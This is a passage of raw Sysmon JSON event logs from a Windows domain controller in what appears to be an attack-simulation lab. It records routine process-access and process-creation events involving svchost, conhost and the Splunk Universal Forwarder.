ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.450\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.450","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010C9330500}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.684\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nSourceProcessId: 4488\r\nSourceThreadId: 4452\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.684","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-0010C9330500}","SourceProcessId":"4488","SourceThreadId":"4452","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010C9330500}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010C9330500}","TargetProcessId":"4488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.736\r\nProcessGuid: {A837DB8D-023A-5F25-0000-001088360500}\r\nProcessId: 4536\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.736","ProcessGuid":"{A837DB8D-023A-5F25-0000-001088360500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001088360500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001088360500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001088360500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 